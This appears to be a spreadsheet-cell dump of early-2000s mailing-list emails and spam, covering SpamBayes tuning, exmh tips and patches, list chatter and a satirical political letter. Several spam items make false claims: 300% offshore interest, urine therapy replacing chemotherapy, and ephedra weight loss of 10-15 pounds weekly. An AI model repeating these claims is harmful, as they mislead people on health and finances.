 Each time Kamuniak, whose name means "the blessed one" in the local Samburu
 tongue, has tried to protect the antelopes from other predators and allowed
 the natural mothers to feed them.
 Unfortunately for her, one oryx ended up in the belly of a male lion while
 Kamuniak slept; the others were either rescued by wardens or retrieved by
 their natural mothers.
 The wardens think the latest adoptee, nicknamed Naisimari ("taken by
 force"), was adopted at the weekend.
 "She must have adopted her on Sunday because they are in harmony," said
 Gabriel Lepariyo, a warden.
 Naisimari's natural mother has been seen shadowing the odd couple at a
 distance.
 Theories to explain the phenonemon abound: not having her own cubs, Kamuniak
 is lonely; she is colour-blind and short-sighted and thinks the calves are
 cubs; the oryx were too frail to flee, breaking the classic prey behaviour
 and confusing the hunter; Kamuniak wants to be a vegetarian; Kamuniak wants
 to be loved. 
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Sell a Home with Ease!
 http://us.click.yahoo.com/SrPZMC/kTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">So then, Tim Peters &lt;tim.one@comcast.net&gt; is all like:
 &gt; [Guido]
 &gt; &gt;   ...
 &gt; &gt;   I don't know how big that pickle would be, maybe loading it each time
 &gt; &gt;   is fine.  Or maybe marshalling.)
 &gt; 
 &gt; My tests train on about 7,000 msgs, and a binary pickle of the database is
 &gt; approaching 10 million bytes.
 My paltry 3000-message training set makes a 6.3MB (where 1MB=1e6 bytes)
 pickle.  hammie.py, which I just checked in, will optionally let you
 write stuff out to a dbm file.  With that same message base, the dbm
 file weighs in at a hefty 21.4MB.  It also takes longer to write:
   Using a database:
    real    8m24.741s
    user    6m19.410s
    sys     1m33.650s
   Using a pickle:
    real    1m39.824s
    user    1m36.400s
    sys     0m2.160s
 This is on a PIII at 551.257MHz (I don't know what it's *supposed* to
 be, 551.257 is what /proc/cpuinfo says).
 For comparison, SpamOracle (currently the gold standard in my mind, at
 least for speed) on the same data blazes along:
    real    0m29.592s
    user    0m28.050s
    sys     0m1.180s
 Its data file, which appears to be a marshalled hash, is 448KB.
 However, it's compiled O'Caml and it uses a much simpler tokenizing
 algorithm written with a lexical analyzer (ocamllex), so we'll never be
 able to outperform it.  It's something to keep in mind, though.
 I don't have statistics yet for scanning unknown messages.  (Actually, I
 do, and the database blows the pickle out of the water, but it scores
 every word with 0.00, so I'm not sure that's a fair test. ;)  In any
 case, 21MB per user is probably too large, and 10MB is questionable.  
 On the other hand, my pickle compressed very well with gzip, shrinking
 down to 1.8MB.
 Neale
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 9 Sep 2002, Rick Baartman wrote:
 &gt; Is there a way to do a global Sort command?
 Wanting to sort like that is not common; I'd be surprised if exmh has
 a widget for it.  You can achieve what you want with the command-line
 mh tools, though.
 I suggest doing the following from a shell prompt:
  sh -c 'for f in "`folders -recurse -fast`" ; do sortm +"$f" ; done'
 (The command "sortm" will sort a particular folder, and
 "folders -recurse -fast" prints out a list of all of your folders.)
 I hope this helps,
  Jacob Morzinski                                jmorzins@mit.edu
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: package my stuff please :P
</t>
  </si>
  <si>
    <t xml:space="preserve">If I have any RPMS in
 http://www.dudex.net/rpms/
 that could be useful to some one with a real apt repository or someone who wants to
 maintain a package, be it known I am not selfish :)
 I found stuff I thought would later get popular so I would not have to maintain the
 RPMs for them after they hit the big time. Gnump3d is an exapmple of this.
 So if anyone is psyched, go for it. If so, let me know so I can get the RPMs from
 you in the future.
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hooters Air concept crashes and burns
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8290377,1717/
 Date: 2002-09-26T21:38:23+01:00
 [IMG: http://www.newsisfree.com/Images/fark/cnn.gif ([CNN])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Patch to enable/disable log
</t>
  </si>
  <si>
    <t xml:space="preserve">While I was playing with the past issues, it annoyed me that there was
 no easy way to make the log stop growing (I don't mean to truncate it,
 I mean to just freeze it for a while).
 The following patch adds a new button to the log window, which allows
 the log to be switched on/off (the button says "Disable" when the
 log is enabled, and the button disables it, and "Enable" when the log
 is frozen, and the button enables it again).
 kre
 --- main.tcl	Wed Aug 21 15:01:48 2002
 +++ /usr/local/lib/exmh-2.5/main.tcl	Wed Aug 28 17:36:59 2002
 @@ -385,6 +385,9 @@
  	ExmhLogCreate
  	wm withdraw $exmh(logTop)
      }
 +    if {! $exmh(logWrite)} {
 +	return
 +    }
      if [info exists exmh(log)] {
  	catch {
  #	    $exmh(log) insert end " [bw_delta] "
 @@ -407,6 +410,9 @@
      set exmh(logWindow) 1
      Exwin_Toplevel .log "Exmh Log" Log
      set exmh(logTop) .log
 +    set exmh(logDisableBut) \
 +	[Widget_AddBut $exmh(logTop).but swap "Disable" ExmhLogToggle]
 +    set exmh(logWrite) 1
      Widget_AddBut $exmh(logTop).but trunc "Truncate" ExmhLogTrunc
      Widget_AddBut $exmh(logTop).but save "Save To File" ExmhLogSave
      set exmh(logYview) 1
 @@ -457,6 +463,12 @@
      } msg] {
  	Exmh_Status "Cannot save log: $msg" error
      }
 +}
 +proc ExmhLogToggle {} {
 +    global exmh
 +
 +    set exmh(logWrite) [expr ! $exmh(logWrite)]
 +    $exmh(logDisableBut) configure -text [lindex {"Enable " Disable} $exmh(logWrite)]
  }
  #### Misc
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: WORD A DAY - "coruscate" - 8/20/02
</t>
  </si>
  <si>
    <t xml:space="preserve">                    *  WORD A DAY  *
 ------------------------------------------------------------
 Do you enjoy this publication? Then give your friends a FREE 
 GIFT SUBSCRIPTION. Just click below and "Shag-a-Friend"! 
     http://www.sendoutmail.com/shag_friend2.asp?l=word 
 &lt;a href="http://www.sendoutmail.com/shag_friend2.asp?l=word"&gt; 
 Give a Gift Subscription!&lt;/a&gt;
 ------------------------------------------------------------
 Fellow Logophiles,
 Hello and good morning! My name is Shannon and I am your new 
 daily provider of words. Did you know that the word "set" has 
 the most definitions in the English language? The Oxford 
 English Dictionary lists 464 definitions of this word. I love 
 receiving your emails so please keep them coming! Let me know 
 what you would like to see in this newsletter. Now on with 
 today's edition!  
 Sincerely,
 Shannon
                              *
    Collector's Series Train Pocket Knife Is Now FREE!
 If you are looking for unique styling in a pocketknife, look 
 no further. Introducing the collector's series Commemorative  
 Steam Engine Pocket Knife. Measuring approximately 7" fully 
 extended, the one-of-a-kind pewter handle depicts a classic 
 Steam Engine Train as it journeys through the dense forests on 
 way to it's destination. The sharp blade (3 in") is made of 
 durable stainless steel and each knife is specially packaged
 in a Cherry Wood designed custom Gift Box with a colored Steam
 Engine Photograph and inlaid with black felt. You can order 
 one or two today for FREE! (s&amp;h $8.87) by visiting:
          http://ads.pulsetv.com/al/a?aid=502&amp;ent=744
 &lt;a href="http://ads.pulsetv.com/al/a?aid=502&amp;ent=744"&gt;
 Click Here To Order&lt;/a&gt;
                              *
 WORD: coruscate  \KOR-uh-skayt\  (intransitive verb)
 :  To give off or reflect bright beams or flashes of light; 
    to sparkle.
 :  To exhibit brilliant, sparkling technique or style. 
 SYNONYMS:  *reflect 
            *shine
 EXAMPLE SENTENCE:  
 Exotic stones and pebbles coruscate on the ocean floor, giv-
 ing the illusion of priceless jewels to the gazers up above.  
 WORD WISE: Coruscate comes from Latin coruscatus, past part-
 iciple of coruscare, to move quickly, to tremble, to flutter, 
 to twinkle or flash. The noun form of the word is coruscation. 
 Also from coruscare is the adjective coruscant, "glittering 
 in flashes; flashing."
                              *
            Open Any Jar Using Your Amazing...
                      SUPER GRIP!
 * As Seen On TV
 * Buy one - Get one FREE!
 Now... you can open any jar, turn any knob or twist-off any 
 cap with remarkable ease! Super grip is the amazing household 
 power tool that up to triples your own wrist strength! Imagine, 
 no more struggling or teeth-gritting over tight lids, caps and 
 knobs. Super-grip is super strong too -- rugged polycarbonate 
 handle and rubberized gripper makes this the most handy and 
 durable tool you can own. 
 Hurry... order now and get (2) Super Grips for the price of 
 one! To order visit: http://ads.pulsetv.com/al/a?aid=502&amp;ent=863
 &lt;a href="http://ads.pulsetv.com/al/a?aid=502&amp;ent=863"&gt;
 Click Here To Order&lt;/a&gt;
                              *
 BONUS WORD OF THE DAY: commodious \kuh-MOH-dee-us\ (adjective)
 : Comfortably or conveniently spacious; roomy; as, a commod-
   ious house. 
 WORD WISE: Commodious derives from the Latin commodus, "con-
 forming to measure, hence convenient or fit for a particular 
 purpose," from com-, "with" + modus, "measure."
                   OBSCURE AND UNUSUAL WORDS
                   *************************
 1) echinate  \ek'in-at\  (adjective)
    : prickly, bristled
 2) hodiernal  \ho-di-ur'nel\  (adjective)
    : pertaining to today
 ------------------------------------------------------------
 Questions... Comments... email us at: mailto:word@shagmail.com
 &lt;a href="mailto:word@shagmail.com"&gt;Send us your comments&lt;/a&gt;
 ************************************************************
 To SUBSCRIBE: http://www.shagmail.com/sub/sub-word.html 
 To UNSUBSCRIBE: http://www.shagmail.com/unsub/word.html 
 ------------------------------------------------------------
                        AOL Links
 ************************************************************
 &lt;a href="http://www.shagmail.com/sub/sub-word.html"&gt;Subscribe&lt;/a&gt;
 &lt;a href="http://www.shagmail.com/unsub/word.html"&gt;Unsubscribe&lt;/a&gt;
 ____________________________________________________________
 END OF WORD A DAY - Another FREE ShagMail publication   
 http://www.shagmail.com
 Copyright 2002 by Pulse Direct, Inc. All rights reserved.
 Feel free to forward this, in its entirety, to others.
 ---
 You are currently subscribed to word as: mothlight@fastmail.fm
</t>
  </si>
  <si>
    <t xml:space="preserve">
 let me put it /another/ way ...
     f&gt; Mike says: how are you?
     f&gt; SmarterChild says: Great thx! You?
     f&gt; Mike says: Fine. What is the weather like in seattle?
     f&gt; SmarterChild says: Current weather conditions for Seattle, WA:
 Out of 8 /million/ alledged visitors, this is the /best/ example???
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] $4,000/Month with your PC ! NO SPAM ! PLEASE READ !
</t>
  </si>
  <si>
    <t xml:space="preserve">DEAR OPPORTUNITIES SEEKERS:
 I THOUGHT YOU JUST MIGHT BE INTERESTED IN THE FOLLOWINGS:
 WE ARE CURRENTLY HIRING WORK HOME 
 TYPIST/CLERK/SECRETARY/SUPERVISOR/TRAINER/MARKETER/MANAGER.WE PAY WEEKLY
 1000 USD 
 POTENTIAL. NO EXPERIENCE OK. MUST KNOW TYPING. NO SEX,AGE LIMIT. PART/FULL
 TIME. ANYWHERE IN 
 THE WORLD. APPLY NOW!
 EMAIL: responsevivek@indiatimes.com and put I AM INTERESTED in subject
 line for details. No spam. Give it a chance.
 OUR BUSINESS LINKS:
 OFFSHORE BANKING HIGH INTERESTS ACCOUNT. 300% PER YEAR
 AFTER YEAR.WHY
 JUST SETTLE FOR 4%? SINCE 1993.MORE INFO . responsevivek@indiatimes.com
 TAKE ADVANTAGE OF OUR (MALAYSIA)LOW CURRENCIES.BUY
 CELLULAR PHONES
 CHEAP. BRAND NAME :MOTOROLA,SIEMEN ETC. FROM 50 USD.BRAND
 NEW.GUARANTEED WORLD LOWEST.GOOD QUALITY.ALL
 MODELS.DETAILS : responsevivek@indiatimes.com. WE ALSO BUY/SELL
 SECOND-HAND CELL PHONES. QUALITY GUARANTEED.
 GUARANTEED WORLD LOWEST PHONE RATES.TRY USE IT YOURSELF
 FOR FREE.OR BE AN AGENT FOR THE TOP TEN AND GET YOUR OWN
 FREE WEB PAGES AND MAKE BIG $$$.ALL FOR FREE.
 PLEASE  CONTACT
 YOUR OWN PERFECT MEDICINE.THE MIRACLE OF URINE
 THERAPY.GOOD-BYE TO
 SURGICAL KNIFE,RADIATION,CHEMO ETC.FRIENDS OF UNRINE
 THERAPY LIFE-TIME
 MEMBERSHIP.FREE CONSULTATION.DR.LIM HENG KIAP,FATHER OF
 URINE
 THERAPY,MALAYSIA,HEAD OF CHARITABLE NATURAL HEALTH
 FARM,FOREST RESERVE
 AREA(FRIM ,KUALA LUMPUR ,MALAYSIA)OTHERS INCLUDE
 :FASTING,HERBAL,HYDRO-NATURAL HOT, COLD SPRING
 SPAS,CRYSTAL,MEDITATION
 ETC.INTERESTED PLEASE CONTACT: responsevivek@indiatimes.com
 ALL THE ABOVE AGENT/DEALER/REPRESENTATIVE WANTED.
 TRADE ENQUIRIES WELCOMED. PLEASE EMAIL: responsevivek@indiatimes.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: TV democracy in action
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,10,215/
 Date: 2002-10-02T18:11:03+01:00
 *Rio dispatch: *18,880 candidates standing in the Brazilian elections get a 
 party political broadcast each, says *Alex Bellos*.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; As I've said before, American
 &gt; Indian Reservations are quite 
 &gt; possibly the only place on the 
 &gt; planet where you can find trailer 
 &gt; park shantytowns where every 
 &gt; household is bringing in a
 &gt; six-figure income.  I wish I 
 &gt; could be exploited like that.  
 Like what, like the rare exception case you've raised or like the "on
 average" case mentioned in the post you were replying to?
 Max
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: what is the sound of one knee jerking?
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=63598
 Date: Not supplied
 http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=63598
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;snip&gt;
 Misc rants about finding jobs, java vs C, what makes a good programmer, etc.
 &lt;/snip&gt;
 Okay, hmm, I thought twice about this, but what the hey, jobs are hard to
 come by. There's a company hiring in Mountain View, looking for a few good
 hackers, no Java, no GUI, not even C++ -- just C and Linux and networking
 and good old stuff like that. They just raised a wad of money and they're
 looking for a few "really good programmers", says the CTO. I know him --
 very smart guy. Drives too fast, though, for what that's worth.
 Joe Bob says "check it out". I'd be happy to pass on your resume, or you can
 send it straight to them. Probably won't matter if I pass it on, since I
 don't know you guys anyway...
 http://www.netli.com
 -- Sherry.
 &gt; -----Original Message-----
 &gt; From: Joseph S. Barrera III [mailto:joe@barrera.org]
 &gt; Sent: Tuesday, August 27, 2002 8:58 AM
 &gt; To: Adam L. Beberg
 &gt; Cc: fork@example.com
 &gt; Subject: Re: Java is for kiddies
 &gt; 
 &gt; 
 &gt; Adam L. Beberg wrote:
 &gt;  &gt;&gt;&gt; Forwarding me stuff from a list is hardly handing me a job.
 &gt;  &gt;&gt;
 &gt;  &gt;&gt; I was talking about the open reqs at Kana (the company I 
 &gt; work for).
 &gt;  &gt;&gt;  Oh, but programming in Java is beneath you.
 &gt;  &gt;
 &gt;  &gt; Nope just lacking years and years of it. For some silly 
 &gt; reason people
 &gt;  &gt; always want things to be reliable, fast, and 
 &gt; cross-platform so all my
 &gt;  &gt; employers have forced me to code in C :)
 &gt; 
 &gt; C is more reliable than Java??
 &gt; 
 &gt; As for cross-platform, C exists on more platforms, but a Java program
 &gt; is much easier to move from one platform to another. So I'm not sure
 &gt; what you mean.
 &gt; 
 &gt; I'm not trying to fight a language war, but I'm puzzled by the depth
 &gt; of your anti-Java hatred.
 &gt; 
 &gt;  &gt; I know lots of high school
 &gt;  &gt; kiddies with plenty of Java tho, not having to teach people about
 &gt;  &gt; pointers or optimization or anything shaves years off the 
 &gt; coder boot
 &gt;  &gt; time. I'll send them your way when they graduate.
 &gt; 
 &gt; Pointers. So a language has to have pointers to be real? And 
 &gt; references
 &gt; don't count, I gather. What's so great about pointers? Why do you
 &gt; miss them? If your doing embedded stuff, fine, yes, you need the
 &gt; performance and control over memory that C provides. Probably.
 &gt; But if your implementing tier N-1 of a tier N system, and pounding
 &gt; against a database, then Java is OFTEN a very reasonable choice.
 &gt; Especially if you want that system to run without leaking memory.
 &gt; 
 &gt; Optimization. Who says you can't optimize Java? I can and have,
 &gt; and there are good tools that allow you to do it (I use OptimizeIt).
 &gt; But usually I find myself optimizing (reducing) database accesses
 &gt; instead. I sped one part of the system up by a factor of ten by
 &gt; grouping more operations into fewer transactions.
 &gt; 
 &gt; But this is beside the point. If you have decent C++ experience, and
 &gt; have poked around in Java, you should be able to convince most
 &gt; employers that you can be trusted writing Java. That's what I did --
 &gt; I mean, I joined Kana from Microsoft, and I didn't exactly write
 &gt; a lot of Java code at Microsoft.
 &gt; 
 &gt;  &gt; I'm not displeased you're trying to help, just frustrated that
 &gt;  &gt; employers can demand such rediculous combinations of skills with
 &gt;  &gt; insane years of experience.
 &gt; 
 &gt; I don't think I've ever interviewed at a place where I actually
 &gt; met all the prerequisites. Do you just give up when you don't?
 &gt; 
 &gt;  &gt; Interview tommorow with Kodak, doing I have no idea what as the
 &gt;  &gt; recruiter isnt even sure, but cross your fingers it wont require 10
 &gt;  &gt; years of Java and 5 years of Windows/IA-64's device driver 
 &gt; experience
 &gt;  &gt; (both common requirements).
 &gt; 
 &gt; I wish you best of luck, and I apologies for being a bitch.
 &gt; But God DAMN, you piss me off sometimes. My son occasionally
 &gt; displays your "can't-do" attitude and I do my damnest to
 &gt; get him to reverse course.
 &gt; 
 &gt; - Joe
 &gt; 
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] One Command -- Four Types
</t>
  </si>
  <si>
    <t xml:space="preserve">I tried several ways to force the command ln to create a link with
 an option attached . . . it wouldn't work.
 How are there four (/bin/dnsdomainname /bin/domainname
 /bin/nisdomainname /bin/ypdomainname) different types of hostname
 links with their own separate options?
 -- 
 Note: When you reply to this message, please include the mailing
       list and/or newsgroup address and my email address in To:
 *********************************************************************
 Signed,
 SoloCDM
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Attn: How about being a few pounds lighter?OLIBYKN
</t>
  </si>
  <si>
    <t xml:space="preserve">How are you doing?
 If you've been like me, you've been trying almost
 EVERYTHING to lose weight. I know how you feel
 - the special diets, miracle pills, and fancy exercise 
 equipment never helped me lose the pounds I needed to lose
 either. It seemed like the harder I worked at it, the less
 weight I lost - until I heard about 'Extreme Power Plus'.
 You're probably thinking to yourself, "Oh geez, not another
 miracle diet pill!" Like you, I was skeptical at first, but 
 my sister said it helped her lose 23 pounds in just 2 weeks, 
 so I told her I'd give it a try. I mean, there was nothing 
 to lose except a lot of weight! Let me tell you, it was
 the best decision I've ever made.  PERIOD.  Six months later,
 as I'm writing this message to you, I've gone from 355 pounds
 to 210 pounds, and I haven't changed my exercise routine or diet
 at all. Yes, I still eat pizza, and lots of it!
 I was so happy with the results that I contacted the manufacturer
 and received permission to resell it - at a HUGE discount.I feel
 the need to help other people lose weight like I did, because it
 does so much for your self-esteem, not to mention your health.
 I am giving you my personal pledge that 'Extreme Power Plus'
 absolutely WILL WORK FOR YOU. 100 % Money-Back GUARANTEED!
 If you are frustrated with trying other products, without having 
 any success, and just not getting the results you were promised,
 then I recommend the only product that worked for me - 
 'EXTREME POWER PLUS'!
 You're probably asking yourself, "Ok, so how does this stuff
 actually work?"
 Extreme Power Plus contains Lipotropic fat burners and ephedra which 
 is scientifically proven to increase metabolism and cause rapid 
 weight loss. No "hocus pocus" in these pills - just RESULTS!!! 
 Here is the bottom line ...
 I can help you lose 10-15 pounds per week naturally, without
 exercising and without having to eat rice cakes all day. 
 Just try it for one month - there's pounds to lose and confidence 
 to gain! You will lose weight fast - GUARANTEED. This is my
 pledge to you.
 BONUS! Order NOW &amp; get FREE SHIPPING on 3 bottles or more! 
 To order Extreme Power Plus on our secure server, just click
 on this link -&gt; http://www.modernherbals.com/
 To see what some of our customers have said about this product, 
 visit http://www.modernherbals.com/testimonials.asp
 To see a list of ingredients and for more information
 on test studies and how it will help you lose weight, visit 
 http://www.modernherbals.com/ingre1.asp
 *****************************************************************
 If you feel that you have received this email in error, please 
 click here -&gt; http://www.moderherbals.com/remove.asp  to request
 to be removed. Thank you, and we apologize for any inconvenience.
 *****************************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Ringing bell on other computer
</t>
  </si>
  <si>
    <t xml:space="preserve">
 BTW:  I remember messing about with such things long ago.  One 
 problem I ran into was making sure that no attempt was made to 
 play a sound when either:
 a)  the screen was locked
   or
 b)  no exmh was running.
 Just something to think about, Dag.
 --Hal
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fwd: [POLITICOS] Re: "Bowling for Columbine," Opens This Friday
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Begin forwarded message:
 &gt; From: Ian Andrew Bell &lt;hello@ianbell.com&gt;
 &gt; Date: Wed Oct 9, 2002  11:16:09 PM US/Pacific
 &gt; To: mike@michaelmoore.com
 &gt; Cc: foib@ianbell.com
 &gt; Subject: [POLITICOS] Re: "Bowling for Columbine," Opens This Friday
 &gt;
 &gt; Michael,
 &gt;
 &gt; Why is it that people who consider voting in an election an 
 &gt; inconvenience would go to see a movie to show support for its message? 
 &gt;  Don't get me wrong -- I think this is the case.  People will go to 
 &gt; see your movie as much to be entertained and informed as they will to 
 &gt; express their malice and discontent towards not only the present 
 &gt; regime in America, but also the corrupt, empty, shallow pantomime 
 &gt; which cast them into power.
 &gt;
 &gt; In reality, today the voting that takes place via the act of 
 &gt; consumption far outweighs the impact caused by people going to a booth 
 &gt; and dimpling the appropriate chad, or some other such convoluted act 
 &gt; of free democratic expression.
 &gt;
 &gt; Why?  Because in America, they believe in dollars.  Dollars don't lie. 
 &gt;  In practise, they are the last frontier of truth in America, 
 &gt; universally accepted as expressions of fear, desire, passion, and 
 &gt; need.  Compared to the swing of the almighty buck, and Jeb Bush knows 
 &gt; this, a hanging chad has only the nethermost meaning.
 &gt;
 &gt; Given that fact, I modestly propose an entirely new, though wholly 
 &gt; logical, extension to the current democratic system in place in 
 &gt; America:
 &gt;
 &gt; I propose we augment, and effectively replace, the electoral system 
 &gt; with a political stock market.  We should accept that Politicians are 
 &gt; entrepreneurs just like any other businessperson in America, and 
 &gt; embrace this fact in building an economic system which truly reflects 
 &gt; their intent.  A politician should issue a constant number of shares 
 &gt; dependent upon his tenure in government.  Those shares should be 
 &gt; traded on an open exchange, say the G.R.E.E.D. (short, of course, for 
 &gt; the "Global Realists' Electoral Exchange -- Democratic").  Politicians 
 &gt; we believe in will see their stocks rise higher as faith in their 
 &gt; ability to maintain office grows.  As the truth about their embezzling 
 &gt; campaign funds for weekend trips to Maui with their interns is 
 &gt; revealed, of course, their fortunes will fall.
 &gt;
 &gt; This represents an opportunity for the market forces -- those same 
 &gt; forces which you intend to harness to express your own personal 
 &gt; protest -- to voice their opinion on the quality of America's 
 &gt; governance during the intervening four years between elections.  
 &gt; Elections themselves will in effect become meaningless, as they are 
 &gt; now, since their outcome will be influenced by the stock price of each 
 &gt; and every congressman, senator, and presidential candidate.
 &gt;
 &gt; Just think of the coverage that could be given on MSNBC!  "Strom 
 &gt; Thurman (STROM: news - quotes) was down 15% today on fears that his 
 &gt; latest heart operation will render him unable to attend Senate Armed 
 &gt; Services committee meetings until November.."  This would provide 
 &gt; rejuvenating content to the econo-political news sector, which has 
 &gt; found post-economic-bubble coverage to be both tiresome and 
 &gt; deoressing.  The establishment of this new stock exchange would of 
 &gt; course create jobs for newly unemployed (and governmentally retrained) 
 &gt; IT systems engineers who could, after passing the electoral securities 
 &gt; exam, become floor traders.
 &gt;
 &gt; This would also allow for a convenient and very public method by which 
 &gt; candidates could raise capital in the public markets to support their 
 &gt; multi-billion-dollar campaigns.  The requirement for the support of 
 &gt; legions of spin doctors, permanent campaign managers, and investor 
 &gt; relations personnel would also create jobs -- perhaps even a new 
 &gt; practice for Ernst &amp; Young, Arthur Anderson, et al.  Insider trading 
 &gt; scandals and misleading revenue declarations would of course catch 
 &gt; Martha Stewart as an unwitting beneficiary, thus spreading her 
 &gt; influence to politics.
 &gt;
 &gt; Dividends, if there are any on record, at the close of a politician's 
 &gt; career could be paid to current shareholders based on the holdings.  
 &gt; Pensions funds could provide the institutional investment support 
 &gt; necessary to underpin even the biggest dogs among the Beltway set.  
 &gt; Union funds, brokerages, and even pump-and-dump houses could benefit 
 &gt; from meteoric rises in conservative candidates running in the 
 &gt; Southeast, and the Bush Governmet would be allowed to place Social 
 &gt; Security bets where they really mattered.   investors who lose their 
 &gt; retirement, life savings, and support could rest assured that they 
 &gt; were indeed robbed by crooks rather than poor investors.
 &gt;
 &gt; Although there's no way to protect any of these for Worldcom-like 
 &gt; crashes, ambitious, inspired, District Attorneys could file criminal 
 &gt; suits against Candidates and Campaign Managers who underperform 
 &gt; expectations, thus assuring investors that their logic was not faulty 
 &gt; -- instead, they were merely defrauded by crooks and thieves.
 &gt;
 &gt; On the whole, I believe the system could work.  I could certainly work 
 &gt; as well as our beloved securities trading industry and, given the 
 &gt; American electoral system's success at effectively expressing the will 
 &gt; of the people, it certainly couldn't do any worse...
 &gt;
 &gt; In the meantime, Mike, I think I'll go see your movie and try to 
 &gt; depose the President.
 &gt;
 &gt; -Ian.
 &gt;
 &gt;
 &gt;
 &gt; On Wednesday, October 9, 2002, at 03:53 PM, Michael Moore's Mailing 
 &gt; List wrote:
 &gt;
 &gt;&gt; October 9, 2002
 &gt;&gt;
 &gt;&gt; My Film, "Bowling for Columbine," Opens This Friday
 &gt;&gt;
 &gt;&gt; Dear friends, fans, and fellow evildoers:
 &gt;&gt;
 &gt;&gt; I am very happy and excited to tell you that this Friday, October 11, 
 &gt;&gt; my
 &gt;&gt; new
 &gt;&gt; film, "Bowling for Columbine," will open in New York and Los Angeles.
 &gt;&gt;
 &gt;&gt; It is, I promise, the last thing the Bushies want projected on the 
 &gt;&gt; movie
 &gt;&gt; screens across America this week. The film is, first and foremost, a
 &gt;&gt; devastating indictment of the violence that is done in our name for 
 &gt;&gt; profit
 &gt;&gt; and power -- and no one, in all the advance screenings I have 
 &gt;&gt; attended, has
 &gt;&gt; left the theatre with anything short of rage. I truly believe this 
 &gt;&gt; film has
 &gt;&gt; the potential to rock the nation and get people energized to do 
 &gt;&gt; something.
 &gt;&gt;
 &gt;&gt; This is not good news for Junior and Company. Not when they are 
 &gt;&gt; trying to
 &gt;&gt; drag us into another war. Not when a crazed sniper is exercising his
 &gt;&gt; constitutional right to own a high-powered rifle. Not when John 
 &gt;&gt; Ashcroft is
 &gt;&gt; still prohibiting the FBI from looking through the gun background 
 &gt;&gt; check
 &gt;&gt; files to see if any of the 19 hijackers or their associates purchased 
 &gt;&gt; any
 &gt;&gt; weapons prior to 9/11 -- because THAT, we are told, would "violate" 
 &gt;&gt; these
 &gt;&gt; terrorists' sacred Second Amendment rights!
 &gt;&gt;
 &gt;&gt; Yes, I believe this movie can create a lot of havoc -- but I will 
 &gt;&gt; need ALL
 &gt;&gt; of you to help me do this. Are you game?
 &gt;&gt;
 &gt;&gt; Last February 5th, I wrote to tell you about a book I had written and 
 &gt;&gt; how
 &gt;&gt; the publisher had decided to dump it because they were afraid to 
 &gt;&gt; publish
 &gt;&gt; anything critical of Bush after 9/11. I appealed to you to save 
 &gt;&gt; "Stupid
 &gt;&gt; White Men" from the shredder and to go out and buy it. I promised you 
 &gt;&gt; would
 &gt;&gt; not regret it, and that the book would not only be a great read but an
 &gt;&gt; important organizing tool in gumming up the plans of George W. Bush.
 &gt;&gt;
 &gt;&gt; Within 24 hours, the book went to #1 on the Amazon best seller list. 
 &gt;&gt; By the
 &gt;&gt; fifth day, the book was already into its 9th printing. The publisher 
 &gt;&gt; was
 &gt;&gt; torn between its desire to kill the book or make a wad of money. 
 &gt;&gt; Greed won
 &gt;&gt; out, and this Sunday the book enters its 31st week on the New York 
 &gt;&gt; Times
 &gt;&gt; best seller list -- and its 32nd printing. This is all because of 
 &gt;&gt; you, my
 &gt;&gt; crazy and loyal friends. You made this happen, against all the odds.
 &gt;&gt;
 &gt;&gt; Now I would like to ask you again to help me with my latest work, 
 &gt;&gt; "Bowling
 &gt;&gt; for Columbine." It's a movie that many critics have already called my 
 &gt;&gt; best
 &gt;&gt; film to date. They may be right. It is certainly the most provocative 
 &gt;&gt; thing
 &gt;&gt; I have ever done. I have spent three years on it and, I have to say, 
 &gt;&gt; it
 &gt;&gt; cuts
 &gt;&gt; deeper, harder and funnier that anything I have given you so far.
 &gt;&gt;
 &gt;&gt; The movie opens this Friday in New York and Los Angeles, and then in 
 &gt;&gt; 8 more
 &gt;&gt; cities next week. How it does in these first ten cities will determine
 &gt;&gt; whether or not the rest of the country gets to see it. That is the 
 &gt;&gt; nutty
 &gt;&gt; way
 &gt;&gt; our films are released. If it doesn't have a big opening weekend, you 
 &gt;&gt; can
